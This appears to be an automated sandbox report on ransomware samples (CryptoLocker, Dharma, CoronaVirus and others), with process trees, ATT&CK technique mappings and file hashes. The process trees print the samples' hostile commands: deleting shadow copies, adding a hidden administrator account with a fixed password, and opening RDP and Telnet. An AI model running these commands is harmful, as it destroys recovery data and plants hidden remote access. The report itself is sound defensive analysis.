  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8812 /prefetch:1
  2⤵
  PID:5300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=10236 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2996 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7776 /prefetch:8
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
  2⤵
  PID:4252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1408 /prefetch:1
  2⤵
  PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:12496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:13364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9224 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6568 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5096

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2724

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1220

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Seftad.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Seftad.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5432

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"
1⤵
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:488
- C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
  "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:5444
- - C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
    "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2196

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3604
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:4868
- - C:\Windows\system32\mode.com
    mode con cp select=1251
    3⤵
    PID:15212
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:30136
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:13540
- - C:\Windows\system32\mode.com
    mode con cp select=1251
    3⤵
    PID:9064
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:14608
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
  2⤵
  PID:14744
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
  2⤵
  PID:14768

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Dharma.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Dharma.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4572
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2324
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe"
  2⤵
  - Sets service image path in registry
  - Executes dropped EXE
  - Impair Defenses: Safe Mode Boot
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4688
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:1832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\Shadow.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\systembackup.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5728
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5580
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:2140
- - C:\Windows\SysWOW64\net.exe
    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2584
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2540
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators systembackup /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3996
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators systembackup /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3076
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      System Location Discovery: System Language Discovery
      PID:1876
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:5900
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" systembackup /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    - System Location Discovery: System Language Discovery
    PID:5096
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      System Location Discovery: System Language Discovery
      PID:5204
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      System Location Discovery: System Language Discovery
      PID:3848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5240
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
    3⤵
    - Hide Artifacts: Hidden Users
    - System Location Discovery: System Language Discovery
    PID:3616
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\users\systembackup +r +a +s +h
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2092
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 3389 "Remote Desktop"
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:324
- - C:\Windows\SysWOW64\sc.exe
    sc config tlntsvr start=auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5432
- - C:\Windows\SysWOW64\net.exe
    net start Telnet
    3⤵
    - System Location Discovery: System Language Discovery
    PID:572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Telnet
      4⤵
      System Location Discovery: System Language Discovery
      PID:3712
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1108

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:30452

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Satana.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Satana.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:12148
- C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Satana.exe
  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Satana.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:14888
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 14888 -s 416
    3⤵
    - Program crash
    PID:15016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 14888 -ip 14888
1⤵
PID:14984

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\FILES ENCRYPTED.txt
1⤵
PID:6288

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:14340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:10992

C:\Windows\System32\Boot\winresume.exe
"C:\Windows\System32\Boot\winresume.exe"
1⤵
PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:5440

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004E4
1⤵
PID:3400

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:6348

C:\Windows\system32\fontview.exe
"C:\Windows\system32\fontview.exe" /d C:\Windows\Fonts\MSYI.TTF
1⤵
PID:6968

C:\Windows\system32\fontview.exe
"C:\Windows\system32\fontview.exe" /d C:\Windows\Fonts\SERIFE.FON
1⤵
PID:7052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Windows Credential Manager

T1555.004

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-79D4D0F5.[[email protected]].ncov

Filesize
3.2MB

MD5
adee80c1c79d43a1bfec6330a4103315

SHA1
8071bdadc111917c1a2dca1a7c36d6172ab83760

SHA256
ef55cdda79cf2626ce0ee492950fb57ac52921b97b055c1e4802dfe4bbd1512d

SHA512
4c5c8142e46edc60cece68bb36cca76761b24c2a19717a64a724e3c35b135a15c903d902bd7547c05fcfca44f7a3b0b58d8466fb959a116aa9c691d786c303a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7145ec3fa29a4f2df900d1418974538

SHA1
1368d579635ba1a53d7af0ed89bf0b001f149f9d

SHA256
efc56eb46cf3352bf706c0309d5d740bca6ac06142f9bdc5e8344b81d4d83d59

SHA512
5bb663ede88f8b7c96b09c1214aac68eda99bc09525ac383baa96914ff7d553ea1aed09e3c9d16893d791c81ddb164c682dfbb4759ac0bc751221f3e36558a91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d91478312beae099b8ed57e547611ba2

SHA1
4b927559aedbde267a6193e3e480fb18e75c43d7

SHA256
df43cd7779d9fc91fd0416155d6771bc81565e98be38689cb17caece256bf043

SHA512
4086c4ebe410a37d0124fc8bd00c58775e70ab2b7b5a39b4e49b332ce5b4866c6775707436395467aff9596507c96fb4896f3bf0249c5b9c99a927f31dcc1a96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
47KB

MD5
9f96d459817e54de2e5c9733a9bbb010

SHA1
afbadc759b65670865c10b31b34ca3c3e000cd31

SHA256
51b37ee622ba3e2210a8175ecd99d26d3a3a9e991368d0efbb705f21ff9ac609

SHA512
aa2514018ef2e39ebde92125f5cc6fb7f778f2ab3c35d4ec3a075578fda41a76dbd7239fe2ea61533fb3262c04739c6500d1497c006f511aa3142bb2696d2307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
d9560905612cf656d5dd0e741172fb4cd9c60688

SHA256
b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608

SHA512
0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
63KB

MD5
226541550a51911c375216f718493f65

SHA1
f6e608468401f9384cabdef45ca19e2afacc84bd

SHA256
caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

SHA512
2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
26KB

MD5
5dea626a3a08cc0f2676427e427eb467

SHA1
ad21ac31d0bbdee76eb909484277421630ea2dbd

SHA256
b19581c0e86b74b904a2b3a418040957a12e9b5ae6a8de07787d8bb0e4324ed6

SHA512
118016178abe2c714636232edc1e289a37442cc12914b5e067396803aa321ceaec3bcfd4684def47a95274bb0efd72ca6b2d7bc27bb93467984b84bc57931fcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
16KB

MD5
144fc04495ecb8dc94d13a866ab0f3d3

SHA1
c4e4e25b100b08c5777263a99709ec4b74652ed3

SHA256
9ec1bb323a1726e8c749002492e873a76c31ffdb7be05a3043d9a978a2ec8503

SHA512
add788c2c78d5ab09bfe897a52ce20345d72b5def5881f63af77933858da3ac1b21b673b957b657ed4441450e9f710a0dc5a90f2d5438ed668e8cfbfce83bd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
16KB

MD5
bd17d16b6e95e4eb8911300c70d546f7

SHA1
847036a00e4e390b67f5c22bf7b531179be344d7

SHA256
9f9613a0569536593e3e2f944d220ce9c0f3b5cab393b2785a12d2354227c352

SHA512
f9647d2d7452ce30cf100aeb753e32203a18a1aaef7b45a4bc558397b2a38f63bfcfe174e26300317b7df176155ae4ebaee6bdf0d4289061860eff68236fe1bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
17KB

MD5
663d0d0966d3e0fe61cb9cd631c35c4c

SHA1
d371a2344f891ad2dc585f66eee08f4330634184

SHA256
97577b7db223876f9a048ad8833c7b55726ed464d8e9d34c303c171a6f32d7e2

SHA512
75be36c722dca266a10e3d8003d7b68906e25f369d9009c6778ecf2f3a4074b6c6307e37eafbd5e9cd755c2a850579df765a1d1d7be1caabd17bf0b426a65d24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
42KB

MD5
23d5f558755a9d58eef69b2bfc9a5d99

SHA1
fa43092cb330dff8dc6c572cb8703b92286219f6

SHA256
6e5bec69b1c6424972a7f5481ac57049811f0f196535b707613126c11292c5cf

SHA512
9c56c94d059a27dab9f69c9dfd718382a8eb192b8c0ce91cd6db6ec0769b8756acf9c0956a35561474b87d6278b13fbe88a6e4df6260c278b1ae06e9be55dd6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
19KB

MD5
ab7532c8d5e38228215da168e80637af

SHA1
00d5eda03bb3dfe84356d39e2d445d54896c3797

SHA256
20ac4ead3e1e487b273d9a733b36efad29462dbe10644f65ee5a69d8aa971240

SHA512
38d0eb27d49db442b3acc674853becc280979a9d2d34a972cebd61b803e5b8455b4f949ab904079d640911db81706ed23b75f3f36cd3ea5aeb98fd243aecd6cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
103KB

MD5
c12602b8ebdfd5ea5113f42ee978d526

SHA1
1159db5c354e5c9a73b2e072b3c0c5d02f3ff07b

SHA256
412aad14e7b55e51c4c56a88949c8f5ac81e06bd1d9b23da4378b1d9711a0794

SHA512
00ba76a1f0f08c969a96f4418c158d482eba611fa5984cec234ded9c7a1aa2e9e4dc2a69816c2940783289767212ac729cb7b3ae4cd002f772a5dc5d45bce3db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
32KB

MD5
79aa4504cab80b1a000bf6f740043880

SHA1
e056ae264c6589b691e7dd97cbd2d806152a6540

SHA256
f6a4b4cc94fec1cdc11a93e38c95957eec79943975aeb4253d9b49988f9a8b23

SHA512
c2aa4477726e3df9d48f46d7bdf7828fa191e51dff70fe313b214be18c8e2220ef56fb0a68f614d8f7cf1ba5d326e6c94fa85a0ffabe4bc5b88ef3f5e2318bad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
50KB

MD5
39cd5d89c27574971fb37e9983ec63b1

SHA1
2bf7a03a3b4d58f24b0b7c49408ee95ad90d4888

SHA256
17e07cceff65072a4a59af2bfd52ae3872deafecb10114ea4d85a69d1d2ca59d

SHA512
4d1e6ddbbb16579265be05e64aad7c1187a8b6471b5e1e52d997fe96ee12fc1908eccf495712d5b49fb664c1f9612bc42a4d2bc23ea1b5775634ddbdeade2972

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
142KB

MD5
dc201428fec5b2ba9d12eeeb5c5678d6

SHA1
46b1069caeafdcdc29a0b0c3579ed7e00a5355f1

SHA256
dde172f712b9cb243bd519c0cfac62f95e4812981eb90eb690068c44846cc648

SHA512
c0588286d42e147c1f516cb4918088c261721b5807f1517a92efc01cf9fbc5434d49f01f7c881d5fa79523e4fb9c1be07ac7f2aacc09ef4361494cb542f90637

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
94KB

MD5
dec3f1721a7651ba3525434b1d35df7f

SHA1
e26295b39bce7d7bb5d31004d0112c90a5d172e6

SHA256
4bd5236d45b685d449febb2f7ae240d8247288895aa23982bdfb4f9120c7936a

SHA512
2943e02ea2ee0dbad28cf46cfda6346aa6d00a6f3883f0c951611ba17dccae752c0c5da87ba5b5cf9bc48962005f3a06f639022ff55b38af7a10e7d63d048d02

Download Submit
